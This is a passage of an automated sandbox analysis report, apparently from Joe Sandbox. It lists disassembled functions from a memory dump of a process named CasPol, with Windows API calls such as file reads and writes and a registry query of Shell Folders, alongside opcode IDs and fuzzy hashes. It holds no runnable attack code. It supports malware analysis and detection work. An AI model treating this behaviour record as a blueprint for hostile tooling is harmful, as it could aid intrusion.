                                                                                                                                                                                    • Instruction Fuzzy Hash: 6FD02231B083007BEA20EE70CC00FCBA2F47F40F12F008C5AB191D2080C374C9495305
                                                                                                                                                                                    Function 0040A2EF Relevance: 1.5, APIs: 1, Instructions: 13fileCOMMON
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • ReadFile.KERNELBASE(00000000,00000000,004450DD,00000000,00000000), ref: 0040A306
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 0000001D.00000002.547995628.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_29_2_400000_CasPol.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: FileRead
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID: 2738559852-0
                                                                                                                                                                                    • Opcode ID: 954c46e0e75d823fede48ea8c55c2feae074eed5d1d1543d384a91c6a040f523
                                                                                                                                                                                    • Instruction ID: df780c2d30ec27a436fe2e8938b9b3026ee6fdf868a35847a3a0dbf755fefbc9
                                                                                                                                                                                    • Opcode Fuzzy Hash: 954c46e0e75d823fede48ea8c55c2feae074eed5d1d1543d384a91c6a040f523
                                                                                                                                                                                    • Instruction Fuzzy Hash: 6DD0C97505020DFBDF01CF81DC06FDD7B7DFB05359F108054BA0095060C7759A15AB55
                                                                                                                                                                                    Function 0040A30E Relevance: 1.5, APIs: 1, Instructions: 13fileCOMMON
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • WriteFile.KERNELBASE(?,00000009,?,00000000,00000000), ref: 0040A325
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 0000001D.00000002.547995628.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_29_2_400000_CasPol.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: FileWrite
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID: 3934441357-0
                                                                                                                                                                                    • Opcode ID: ceb9d1a6229db680868981d1c52190471358147ed4569e3c2bde9500725be326
                                                                                                                                                                                    • Instruction ID: 3280266517864b8de079c100525e5277478ec149926fcdeece843fe2c70d8c86
                                                                                                                                                                                    • Opcode Fuzzy Hash: ceb9d1a6229db680868981d1c52190471358147ed4569e3c2bde9500725be326
                                                                                                                                                                                    • Instruction Fuzzy Hash: CFD0C93501020DFBDF01CF81DC06FDD7BBDFB04359F108054BA1095060D7B59A20AB94
                                                                                                                                                                                    Function 00413D29 Relevance: 1.5, APIs: 1, Instructions: 13COMMON
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • FreeLibrary.KERNELBASE(00000000,004457F2,00000000,000001F7,00000000), ref: 00413D30
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 0000001D.00000002.547995628.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_29_2_400000_CasPol.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: FreeLibrary
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID: 3664257935-0
                                                                                                                                                                                    • Opcode ID: 4aed56dde2bff02888507ea152729a1ee15f70291d16ca6bd798c1e7fc2ec88c
                                                                                                                                                                                    • Instruction ID: 8f6381f957debc367d4a0444659be52de1bfd3a154b3998764173f6a98a011bd
                                                                                                                                                                                    • Opcode Fuzzy Hash: 4aed56dde2bff02888507ea152729a1ee15f70291d16ca6bd798c1e7fc2ec88c
                                                                                                                                                                                    • Instruction Fuzzy Hash: 1DD0C9765002229BDB10AF26EC057857378FF00712B110425E810B7594D778BEE68ADC
                                                                                                                                                                                    Function 004096C3 Relevance: 1.5, APIs: 1, Instructions: 10fileCOMMON
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • CreateFileW.KERNELBASE(00000000,80000000,00000003,00000000,00000003,00000000,00000000), ref: 004096D5
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 0000001D.00000002.547995628.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_29_2_400000_CasPol.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: CreateFile
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID: 823142352-0
                                                                                                                                                                                    • Opcode ID: 5246709bc6ec1dabf70528f5ad42ffc01d78c7e2d09fe5df7c46969d7a5ea179
                                                                                                                                                                                    • Instruction ID: 15e4bfb1af8ab284213ec8af4af1ca3ed9a3c322684c6da9746693c795416a08
                                                                                                                                                                                    • Opcode Fuzzy Hash: 5246709bc6ec1dabf70528f5ad42ffc01d78c7e2d09fe5df7c46969d7a5ea179
                                                                                                                                                                                    • Instruction Fuzzy Hash: A8C092B0280200BEFE224B10EC15F36755CE744700F2008247E40F40E0C1605E108524
                                                                                                                                                                                    Function 004096DC Relevance: 1.5, APIs: 1, Instructions: 10fileCOMMON
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • CreateFileW.KERNELBASE(00000001,40000000,00000001,00000000,00000002,00000000,00000000), ref: 004096EE
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 0000001D.00000002.547995628.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_29_2_400000_CasPol.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: CreateFile
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID: 823142352-0
                                                                                                                                                                                    • Opcode ID: ab7a8cdf7eb8bf952c1c1b88a04d9996938fd5cdd98684eb6691b5f60f9c195d
                                                                                                                                                                                    • Instruction ID: 13aef0f41518da9c32968a96bed17b980f0e8f352a8d1793a660c4ee04e7d177
                                                                                                                                                                                    • Opcode Fuzzy Hash: ab7a8cdf7eb8bf952c1c1b88a04d9996938fd5cdd98684eb6691b5f60f9c195d
                                                                                                                                                                                    • Instruction Fuzzy Hash: B8C012F02903007EFF204B10AC0AF37755DF784700F2048207E40F40E1C2B15C008524
                                                                                                                                                                                    Function 0040B04B Relevance: 1.5, APIs: 1, Instructions: 9COMMON
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • ??3@YAXPAX@Z.MSVCRT(00000000,00401B44,0044E518,?,00000001,00401B95,?,00401EE4), ref: 0040B052
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 0000001D.00000002.547995628.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_29_2_400000_CasPol.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: ??3@
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID: 613200358-0
                                                                                                                                                                                    • Opcode ID: ffbe44a51c26d842ca56a491b3c7d92fb1c4d2adc00a6a519549e0909776451f
                                                                                                                                                                                    • Instruction ID: 6ff791ec813821c2e9e24527ebed0d702daabad41f6d5d50af9b89e3d4ad0470
                                                                                                                                                                                    • Opcode Fuzzy Hash: ffbe44a51c26d842ca56a491b3c7d92fb1c4d2adc00a6a519549e0909776451f
                                                                                                                                                                                    • Instruction Fuzzy Hash: ADC09BB15117014BE7305F15D40471373D49F11727F318C1DA5D1914C2D77CD4408518
                                                                                                                                                                                    Function 004135E0 Relevance: 1.5, APIs: 1, Instructions: 8COMMON
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • FreeLibrary.KERNELBASE(?,00413603,00000000,0044557A,?,?,?,?,?,00403335,?), ref: 004135EC
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 0000001D.00000002.547995628.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_29_2_400000_CasPol.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: FreeLibrary
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID: 3664257935-0
                                                                                                                                                                                    • Opcode ID: 844f7501f44133ba018c3401d7aef3826eb6c790b17bce713828cee3c51aa695
                                                                                                                                                                                    • Instruction ID: 97b2006ec1e2dd28fddd19cbcf35086f2a6b1d7d6d8af37d8808782836c913ed
                                                                                                                                                                                    • Opcode Fuzzy Hash: 844f7501f44133ba018c3401d7aef3826eb6c790b17bce713828cee3c51aa695
                                                                                                                                                                                    • Instruction Fuzzy Hash: C1C04C355107129BE7318F22C849793B3E8BB00767F40C818A56A85454D7BCE594CE28
                                                                                                                                                                                    Function 0041493C Relevance: 1.5, APIs: 1, Instructions: 8COMMON
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • EnumResourceNamesW.KERNEL32(?,?,Function_000148B6,00000000), ref: 0041494B
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 0000001D.00000002.547995628.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_29_2_400000_CasPol.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: EnumNamesResource
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID: 3334572018-0
                                                                                                                                                                                    • Opcode ID: 66f1156765df5e37ef2ff2f84c2d9879992723494834984b76c3e66af834c78a
                                                                                                                                                                                    • Instruction ID: 4cd0fc1a45efe5f4a77ff86a676eea9814a6d41529a344ef69fdb726e0e13cac
                                                                                                                                                                                    • Opcode Fuzzy Hash: 66f1156765df5e37ef2ff2f84c2d9879992723494834984b76c3e66af834c78a
                                                                                                                                                                                    • Instruction Fuzzy Hash: 5CC09B355943819FD711DF108C05F1A76D5BF95705F104C397151940A0C7614014A60A
                                                                                                                                                                                    Function 0044DEA5 Relevance: 1.5, APIs: 1, Instructions: 8COMMON
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • FreeLibrary.KERNELBASE(?), ref: 0044DEB6
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 0000001D.00000002.547995628.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_29_2_400000_CasPol.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: FreeLibrary
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID: 3664257935-0
                                                                                                                                                                                    • Opcode ID: bc29afbdeb633a61cc40634aee98d5405fe4c9068b08d77425fcd78e2ed3a7cd
                                                                                                                                                                                    • Instruction ID: c12df66a07a312a107e4de7a98dbd39cb061029a89fa16cd2619b088cce9516a
                                                                                                                                                                                    • Opcode Fuzzy Hash: bc29afbdeb633a61cc40634aee98d5405fe4c9068b08d77425fcd78e2ed3a7cd
                                                                                                                                                                                    • Instruction Fuzzy Hash: 95C04C35D10311ABFB31AB11ED4975232A5BB00717F52006494128D065D7B8E454CB2D
                                                                                                                                                                                    Function 0040AEBE Relevance: 1.5, APIs: 1, Instructions: 8COMMON
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • FindClose.KERNELBASE(?,0040AE21,?,00000000,00445EF5,*.*,?,00000000,?,00000104,?,?,?,?,?,00000104), ref: 0040AEC8
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 0000001D.00000002.547995628.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_29_2_400000_CasPol.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: CloseFind
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID: 1863332320-0
                                                                                                                                                                                    • Opcode ID: c351b702f3e9cabc65afcca29c8835cc335007c1b5069ed2425bca2f993f3ba3
                                                                                                                                                                                    • Instruction ID: 0a5868f0c47a417661f40efe111cada53839b745ef6d73ffe26d621af3302058
                                                                                                                                                                                    • Opcode Fuzzy Hash: c351b702f3e9cabc65afcca29c8835cc335007c1b5069ed2425bca2f993f3ba3
                                                                                                                                                                                    • Instruction Fuzzy Hash: 06C092341506058BD62C5F38DC9A42A77A0BF4A3303B40F6CA0F3D24F0E73888538A04
                                                                                                                                                                                    Function 00414592 Relevance: 1.5, APIs: 1, Instructions: 7registryCOMMON
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • RegOpenKeyExW.KERNEL32(80000002,80000002,00000000,00020019,80000002,00414CC1,80000002,Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders,00445DDE,?,?,00000000), ref: 004145A5
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 0000001D.00000002.547995628.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_29_2_400000_CasPol.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: Open
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID: 71445658-0
                                                                                                                                                                                    • Opcode ID: cea4c8dffb5a7e03adddd135b873dbda16caaf5da1da7b073e7ed9ea122c33c6
                                                                                                                                                                                    • Instruction ID: 4e31294bd56c0fd8f54a78566f459ab053e1b17b284f5820c9a90ca28514d216
                                                                                                                                                                                    • Opcode Fuzzy Hash: cea4c8dffb5a7e03adddd135b873dbda16caaf5da1da7b073e7ed9ea122c33c6
                                                                                                                                                                                    • Instruction Fuzzy Hash: C4C09B35544311BFDE114F40FD09F09BB61BB84B05F004414B254640B182714414EB17
                                                                                                                                                                                    Function 00409B98 Relevance: 1.5, APIs: 1, Instructions: 7COMMON
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • GetFileAttributesW.KERNELBASE(?,00445E12,?,?,?,00000104), ref: 00409B9C
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 0000001D.00000002.547995628.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_29_2_400000_CasPol.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: AttributesFile
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID: 3188754299-0
                                                                                                                                                                                    • Opcode ID: 58881c252121c77da0d0db5638804f50f66f4a7a85cb6d231bcd6b2301be346c
                                                                                                                                                                                    • Instruction ID: 3e515636d229e53f9e638efbf3d1d2cf0185fd636b5c9b7db17c068ea44c501e
                                                                                                                                                                                    • Opcode Fuzzy Hash: 58881c252121c77da0d0db5638804f50f66f4a7a85cb6d231bcd6b2301be346c
                                                                                                                                                                                    • Instruction Fuzzy Hash: B9B012792104005BCB0807349C4904D35507F456317200B3CF033C00F0D730CC61BA00
                                                                                                                                                                                    Function 0041BE52 Relevance: 1.3, APIs: 1, Instructions: 99COMMON
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 0000001D.00000002.547995628.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_29_2_400000_CasPol.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID:
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                    • Opcode ID: 519045b8856ea86e6d8d1e97e8a9a2cac293cdb0bbecd69caab4774d1a49c2e8
                                                                                                                                                                                    • Instruction ID: 186a7b248be49691fb09735f75239c469d17650efe27a5986e87276cb9a2b443
                                                                                                                                                                                    • Opcode Fuzzy Hash: 519045b8856ea86e6d8d1e97e8a9a2cac293cdb0bbecd69caab4774d1a49c2e8
                                                                                                                                                                                    • Instruction Fuzzy Hash: E8318B31901616EFDF24AF25D8417DA73A0FF04314F10416BF91497251DB38ADE18BDA
                                                                                                                                                                                    Function 004095D9 Relevance: 1.3, APIs: 1, Instructions: 66COMMON
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • memset.MSVCRT ref: 004095FC
                                                                                                                                                                                      • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D29
                                                                                                                                                                                      • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D33
                                                                                                                                                                                      • Part of subcall function 00409D1F: wcscpy.MSVCRT ref: 00409D47
                                                                                                                                                                                      • Part of subcall function 00409D1F: wcscat.MSVCRT ref: 00409D55
                                                                                                                                                                                      • Part of subcall function 00409B98: GetFileAttributesW.KERNELBASE(?,00445E12,?,?,?,00000104), ref: 00409B9C
                                                                                                                                                                                      • Part of subcall function 004091B8: memset.MSVCRT ref: 004091E2
                                                                                                                                                                                      • Part of subcall function 004091B8: memcpy.MSVCRT(?,00000000,?,?,?,?,?,?,?,?,?,?,00000143,00000000), ref: 004092C9
                                                                                                                                                                                      • Part of subcall function 004091B8: memcmp.MSVCRT ref: 004092D9
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 0000001D.00000002.547995628.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_29_2_400000_CasPol.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: memsetwcslen$AttributesFilememcmpmemcpywcscatwcscpy
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID: 3655998216-0
                                                                                                                                                                                    • Opcode ID: e30004be4bbbfeced16a1849f7c4d541b3adc094efc719b7744e08ea692a1bc4
                                                                                                                                                                                    • Instruction ID: 072a19641c33d96fdc78833b4ff670bebeeceb9371718ab52934a970b5968781
                                                                                                                                                                                    • Opcode Fuzzy Hash: e30004be4bbbfeced16a1849f7c4d541b3adc094efc719b7744e08ea692a1bc4
                                                                                                                                                                                    • Instruction Fuzzy Hash: F311607290021D6AEF20A662DC4AE9B376CEF41318F10047BB908E51D2EA79DE548659
                                                                                                                                                                                    Function 00445403 Relevance: 1.3, APIs: 1, Instructions: 60COMMON
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • memset.MSVCRT ref: 00445426
                                                                                                                                                                                      • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D29
                                                                                                                                                                                      • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D33
                                                                                                                                                                                      • Part of subcall function 00409D1F: wcscpy.MSVCRT ref: 00409D47
                                                                                                                                                                                      • Part of subcall function 00409D1F: wcscat.MSVCRT ref: 00409D55
                                                                                                                                                                                      • Part of subcall function 00409B98: GetFileAttributesW.KERNELBASE(?,00445E12,?,?,?,00000104), ref: 00409B9C
                                                                                                                                                                                      • Part of subcall function 0040B6EF: memset.MSVCRT ref: 0040B71C
                                                                                                                                                                                      • Part of subcall function 0040B6EF: wcsrchr.MSVCRT ref: 0040B738
                                                                                                                                                                                      • Part of subcall function 0040B6EF: memset.MSVCRT ref: 0040B756
                                                                                                                                                                                      • Part of subcall function 0040B6EF: memset.MSVCRT ref: 0040B7F5
                                                                                                                                                                                      • Part of subcall function 0040B6EF: CreateFileW.KERNELBASE(00445FAE,80000000,00000000,00000000,00000003,00000000,00000000), ref: 0040B80C
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 0000001D.00000002.547995628.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_29_2_400000_CasPol.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: memset$Filewcslen$AttributesCreatewcscatwcscpywcsrchr
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID: 1828521557-0
                                                                                                                                                                                    • Opcode ID: ea4a949cbb04dc179977b6e9e50e7a1e4e6e0668b18cbdf2d6b9d2270a501428
                                                                                                                                                                                    • Instruction ID: 9d1500c39017731ad640c46c84131142cb98d7893e2d711cbdbff08f65233ce4
                                                                                                                                                                                    • Opcode Fuzzy Hash: ea4a949cbb04dc179977b6e9e50e7a1e4e6e0668b18cbdf2d6b9d2270a501428
                                                                                                                                                                                    • Instruction Fuzzy Hash: 4B1186B294011D7BEB10E751DC4AFDB776CEF51328F10047FB518A50C2E6B8AAC486A9
                                                                                                                                                                                    Function 004068BF Relevance: 1.3, APIs: 1, Instructions: 59COMMON
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    APIs
                                                                                                                                                                                      • Part of subcall function 0040AFCF: ??2@YAPAXI@Z.MSVCRT ref: 0040AFD8
                                                                                                                                                                                      • Part of subcall function 004062A6: SetFilePointerEx.KERNELBASE(0040627C,?,?,00000000,00000000), ref: 004062C2
                                                                                                                                                                                    • memcpy.MSVCRT(00000000,00000000,?,00000000,00000000,?,00000000,0040627C), ref: 00406942
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 0000001D.00000002.547995628.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_29_2_400000_CasPol.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: ??2@FilePointermemcpy
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID: 609303285-0
                                                                                                                                                                                    • Opcode ID: cfa0e116d589173c1f74b587a6cbbf9e28bf831d76649fdc759f8710e9f20be5
                                                                                                                                                                                    • Instruction ID: a147fa8ec668463fbbadbca9a08a444fcb23aa95a0ceadfc627c4072e562ebd5
                                                                                                                                                                                    • Opcode Fuzzy Hash: cfa0e116d589173c1f74b587a6cbbf9e28bf831d76649fdc759f8710e9f20be5
                                                                                                                                                                                    • Instruction Fuzzy Hash: 4B11A7B2500108BBDB11A755C840F9F77ADDF85318F16807AF90677281C778AE2687A9
                                                                                                                                                                                    Function 00406B90 Relevance: 1.3, APIs: 1, Instructions: 56COMMON
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    APIs
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 0000001D.00000002.547995628.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_29_2_400000_CasPol.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: _wcsicmp
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID: 2081463915-0
                                                                                                                                                                                    • Opcode ID: b978923b786281d4dff967b9753de8351d719aa9e76d1b7e7943c841c1b1a5dc
                                                                                                                                                                                    • Instruction ID: 44e68c08f8902dbc9d3bec9e3d7b81d72528a2b8c41660eeece459a1934edfa0
                                                                                                                                                                                    • Opcode Fuzzy Hash: b978923b786281d4dff967b9753de8351d719aa9e76d1b7e7943c841c1b1a5dc
                                                                                                                                                                                    • Instruction Fuzzy Hash: 0C118CB1600205AFD710DF65C8809AAB7F8FF44314F11843EE55AE7240EB34F9658B68
                                                                                                                                                                                    Function 00406214 Relevance: 1.3, APIs: 1, Instructions: 39COMMON
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    APIs
                                                                                                                                                                                      • Part of subcall function 00406294: CloseHandle.KERNEL32(000000FF), ref: 0040629C
                                                                                                                                                                                      • Part of subcall function 004096C3: CreateFileW.KERNELBASE(00000000,80000000,00000003,00000000,00000003,00000000,00000000), ref: 004096D5
                                                                                                                                                                                    • GetLastError.KERNEL32(00000000,00000000,0040E03C,?,00000000,00000104,00000000,?,?,?,0040E521,?,0040E6A3,000000FF,?,00000104), ref: 00406281
                                                                                                                                                                                      • Part of subcall function 0040A2EF: ReadFile.KERNELBASE(00000000,00000000,004450DD,00000000,00000000), ref: 0040A306
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 0000001D.00000002.547995628.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_29_2_400000_CasPol.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: File$CloseCreateErrorHandleLastRead
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID: 2136311172-0
                                                                                                                                                                                    • Opcode ID: b6bd1096ce10d17f9a7701a6d0a27b928aedeb77931263aba22673ea05e1db24
                                                                                                                                                                                    • Instruction ID: 5eec059ee86d0bbb8aaa5289f200f29bbda103cdac5cb86a40c163b72aa3aa4c
                                                                                                                                                                                    • Opcode Fuzzy Hash: b6bd1096ce10d17f9a7701a6d0a27b928aedeb77931263aba22673ea05e1db24
                                                                                                                                                                                    • Instruction Fuzzy Hash: 3F01D6B14017018FD7206B70CD05BA273D8EF10319F11897EE55BE62D1EB3C9861866E
                                                                                                                                                                                    Function 0040AFCF Relevance: 1.3, APIs: 1, Instructions: 12COMMON
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    APIs
                                                                                                                                                                                      • Part of subcall function 0040B04B: ??3@YAXPAX@Z.MSVCRT(00000000,00401B44,0044E518,?,00000001,00401B95,?,00401EE4), ref: 0040B052
                                                                                                                                                                                    • ??2@YAPAXI@Z.MSVCRT ref: 0040AFD8
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 0000001D.00000002.547995628.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_29_2_400000_CasPol.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: ??2@??3@
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID: 1936579350-0
                                                                                                                                                                                    • Opcode ID: d9146978952df4032bb52ee1fc914549b8afd9994305f4c2f79ca13836f6df5d
                                                                                                                                                                                    • Instruction ID: 89dc8af08517091935dcea8fd058adf4401913b4726dbdea6cb301b2924d739e
                                                                                                                                                                                    • Opcode Fuzzy Hash: d9146978952df4032bb52ee1fc914549b8afd9994305f4c2f79ca13836f6df5d
                                                                                                                                                                                    • Instruction Fuzzy Hash: 8FC02B7240C2100FD730FF74340205736D4CE422203028C2FE0E4D3101DB3C840103C8
                                                                                                                                                                                    Function 0040B633 Relevance: 1.3, APIs: 1, Instructions: 10COMMON
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    APIs
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 0000001D.00000002.547995628.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_29_2_400000_CasPol.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: free
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID: 1294909896-0
                                                                                                                                                                                    • Opcode ID: 064fc9ad2ab7598503b0803575f79bda8c80cd2f5cc7d751fc92f1905ed38621
                                                                                                                                                                                    • Instruction ID: 84c58710a9e867f17c2d1ed9f7495b278bdfae561cd9e9721482330d0bfefd66
                                                                                                                                                                                    • Opcode Fuzzy Hash: 064fc9ad2ab7598503b0803575f79bda8c80cd2f5cc7d751fc92f1905ed38621
                                                                                                                                                                                    • Instruction Fuzzy Hash: 48C00272510B018FEB209E16C405762B3E4AF5173BF928C1D949591481D77CE4448A1D
                                                                                                                                                                                    Function 0040AA04 Relevance: 1.3, APIs: 1, Instructions: 10COMMON
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    APIs
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 0000001D.00000002.547995628.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_29_2_400000_CasPol.jbxd
                                                                                                                                                                                    Similarity
